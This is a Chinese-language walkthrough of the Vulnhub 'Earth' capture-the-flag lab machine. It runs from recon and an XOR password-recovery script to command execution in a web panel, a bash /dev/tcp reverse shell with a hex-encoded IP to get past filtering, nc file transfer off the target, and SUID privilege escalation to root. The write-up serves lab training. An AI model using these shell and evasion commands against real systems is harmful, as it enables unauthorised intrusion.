其他分享
首页 > 其他分享> > Vulnhub-Earth

Vulnhub-Earth

作者:互联网

Earth靶机下载:https://www.vulnhub.com/entry/the-planets-earth,755/

攻击机:KALI


 

信息搜集

在KALI中使用ARP-SCAN确认靶机IP

arp-scan -l

 

 

 

 使用NMAP扫描端口,发现443端口有DNS解析

nmap -A -p 1-65535 192.168.122.135

 

 

 

 将DNS加入/etc/hosts

 

 

 

 访问earth.local,发现一些信息

 

 

扫描目录

dirb http://earth.local/

 

 

 

 

 

打开后发现是登陆界面

再次扫描

dirb https://earth.local/

 

 

 

 

发现存在robots.txt,打开后看到/testingnotes.*

猜测尝试后发现为txt文件并打开

 

 

 

 

 

 根据提示访问testdata.txt文件

 

 

 


 

漏洞攻击

编写XOR脚本,将earth.local的信息与testdata.txt进行异或运算

import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))

运算后得到

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

将输出的16进制转换为字符

 

 

 发现转换后的内容是循环的,得出字符串earthclimatechangebad4humans

 

 

 根据之前英文提示使用terra/earthclimatechangebad4humans尝试登录

 

 

 

 登录成功并发现输入框可执行系统指令

 

 

 使用find命令查找flag

find / -name "*flag*"

 

 

查找后打开/var/earth_web/usr_flag.txt得到第一个flag

 

 

 

接下来使用反弹shell连接到靶机

bash -i >& /dev/tcp/192.168.122.131/8888 0>&1

执行后无反应

将IP进行16进制转换后成功执行

bash -i >& /dev/tcp/0xc0.0xa8.0x7a.0x83/8888 0>&1

 

 

 

 

 

 


 

提权

查找有权限的命令

find / -perm -u=s -type f 2>/dev/null

 

 

发现有个/usr/bin/reset_root

尝试运行

 

 

发现报错

CHECKING IF RESET TRIGGERS PRESENT... RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.   没有调试的命令,使用nc传送到本地调试一下
nc -nlvp 8888 >reset_root
nc 192.168.122.131 8888 < /usr/bin/reset_root

 

 

 

 

使用strace打开

strace /root/reset_root

 

 

发现权限不够,使用chmod

 

 

之前执行reset_root报错是由于缺少三个文件 在靶机中添加这三个文件

 

 

靶机再尝试运行reset_root

 

 

 

 

成功提权到root

查找flag后打开

 

 

标签:reset,flag,Vulnhub,earth,Earth,靶机,txt,root
来源: https://www.cnblogs.com/hyphon/p/16350867.html